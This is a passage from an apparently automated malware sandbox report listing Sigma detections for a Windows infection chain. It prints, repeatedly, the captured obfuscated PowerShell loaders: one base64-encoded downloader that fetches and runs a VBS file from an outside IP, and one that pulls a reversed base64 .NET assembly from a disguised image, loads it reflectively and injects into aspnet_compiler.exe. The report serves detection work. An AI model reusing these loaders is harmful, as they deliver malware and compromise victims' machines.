cHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgI

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , ProcessId: 7900, ProcessName: wscript.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7948, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 5816, ProcessName: aspnet_compiler.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", ProcessId: 7772, ProcessName: csc.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\icgfugf, CommandLine: C:\Users\user\AppData\Roaming\icgfugf, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\icgfugf, NewProcessName: C:\Users\user\AppData\Roaming\icgfugf, OriginalFileName: C:\Users\user\AppData\Roaming\icgfugf, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\icgfugf, ProcessId: 7700, ProcessName: icgfugf

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7608, TargetFilename: C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , ProcessId: 7900, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7608, TargetFilename: C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", CommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICA

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion 